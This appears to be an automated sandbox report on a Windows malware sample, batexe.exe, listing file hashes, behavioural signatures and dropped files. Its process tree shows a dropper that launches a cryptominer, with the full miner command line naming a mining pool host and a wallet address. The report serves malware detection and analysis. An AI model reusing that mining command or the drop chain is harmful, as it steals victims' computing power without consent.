Analysis
-
max time kernel
293s -
max time network
298s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
17/02/2024, 11:05
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 5036 b2e.exe 4332 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 4332 cpuminer-sse2.exe 4332 cpuminer-sse2.exe 4332 cpuminer-sse2.exe 4332 cpuminer-sse2.exe 4332 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/4624-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 4624 wrote to memory of 5036 4624 batexe.exe 85 PID 4624 wrote to memory of 5036 4624 batexe.exe 85 PID 4624 wrote to memory of 5036 4624 batexe.exe 85 PID 5036 wrote to memory of 2324 5036 b2e.exe 86 PID 5036 wrote to memory of 2324 5036 b2e.exe 86 PID 5036 wrote to memory of 2324 5036 b2e.exe 86 PID 2324 wrote to memory of 4332 2324 cmd.exe 89 PID 2324 wrote to memory of 4332 2324 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\55B1.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\55B1.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\55B1.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\58ED.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4332
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13.2MB
MD519dae3cb98b7faa4a172c5c0bab5890f
SHA1cc25a9a427eeddae135f2f8788e83d697b431ad6
SHA256ec3fb29d80b57e7ebb59110a7f5f0d55fc3ac459fb037df3da8f86d24ebb39bc
SHA512285968bae09a04a9f2ab72896bc4a5efa5415070e3dbc49d60a6adc35bacbd8959a1d1a8b6b66e503cde4006f94271a90cc32a63f2446cba741b7df8469446a9
-
Filesize
2.6MB
MD578f1b3544a25f5701553811eba6eb4ba
SHA1396a52752aea33cd0e4aa1f64832444aa9619827
SHA25655398c57389165e9aa696d7db9079a5b4d132403540d6c662b26c53419ebcadf
SHA512351d69747b2c0834891a95dffbe0f9e256c951e1f1560edee5d4073c10431a6dd44eda3cc492291ff41b7852a0f1829766e1fa7106f47aa1579f15d238d1de9d
-
Filesize
2.2MB
MD55c213821d939c8afca1ae90f84048fe2
SHA1b0413a9cf379e4d85f79d0b239d432fc2e2e4f27
SHA256e7a13c6710f0440359ae04f00a46672baa38fc40c38905a03a5976f935e3f641
SHA512a7ece9f91f8af74fd1b57602ce117ce12eac919443e977d3d0042c0a6252985e734d06630a51f1cc0258d7828beae45d5d0e02f106345657aa15a96ec8ed8e74
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
1.6MB
MD5563d08e19ac8d9129dc8525c32cd653a
SHA186df9f0b70a57dfb0108b7dcaeb3c27880ebe656
SHA256f1233d9392ad5e7f9a78012bcd5e277745228881876290248b45885fc5134860
SHA5128ce7ecd9dc2ffed802c2bb87bdb3dccf992213773ed7de98478533c6ddc73a99da23dcf64317616eecf4395f6103d6e599d51d5451535c26c800a1740d04454f
-
Filesize
2.2MB
MD526f8379c767d238d2c080e59a9b70421
SHA1b09592d3347f7e4dabd14f4e3831191370e1ebad
SHA256561167c01043b5bcef2f31a5e89af5c11188817103e3529eec4d64fda69920dc
SHA512fb03e09d6eb4813c51850acd0b6acca762c429b4d5337f2e9be778b0c6e6811149c3258c05367d8ea438464f6461071f83708d99b3c3e34a8aa48f3ee93d8817
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
1.2MB
MD57cf672bee2afba2dcd0c031ff985958e
SHA16b82a205db080ffdcb4a4470fce85a14413f3217
SHA256c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05
SHA5123e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5
-
Filesize
1.6MB
MD56bb6eb093fbe5e5bced7cca179759f07
SHA144688b2f7f74351357c83cd4f51a7917d7da94a0
SHA2560ce3a366924c41313f6cb04fe41f54ae62c0d8cca7363a1d1024f447b6c3c9e5
SHA512862e3f388a521874b3538f4f5b75701b949d6c948d3f7af51c8fb46b3b39f3d0085c7ed02070f14778ace4cfcf9abcc6a23732b1c162b78208e716d148860e57
-
Filesize
1.6MB
MD5d2c4aa8c98cab0173bd419a320ae6f50
SHA1102881be1db41ed7e5edfa814da5827f91d1646a
SHA25624ca57f5e657fd1892b1db7e0b4c934d0bcb85515baf16b767903f8fb922dc9c
SHA5126a1ceccc7dd617447a2622f90b39a6857a4256fc7c21a361882113c014ab047ec504d1042cc30c833797131971de9949959a5966e009869e5cc65db96308777a
-
Filesize
1.5MB
MD58b295d88eab75a813562310497ed326e
SHA12660951fe1769156b204622352083948297a35c4
SHA2563a8848d479800c3d224a10dd46010c1d23072734b3fa9cac011a39c4b827cd8d
SHA5120dddc84a8eb881aa878ebd0f5e8846b3b4137cfdd05437c0c70890c6fa528a24f2e1c056a8f1cfbbe54b063e913baed96a5b7adc3c78bf0a5e39dbd2e4f06386
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770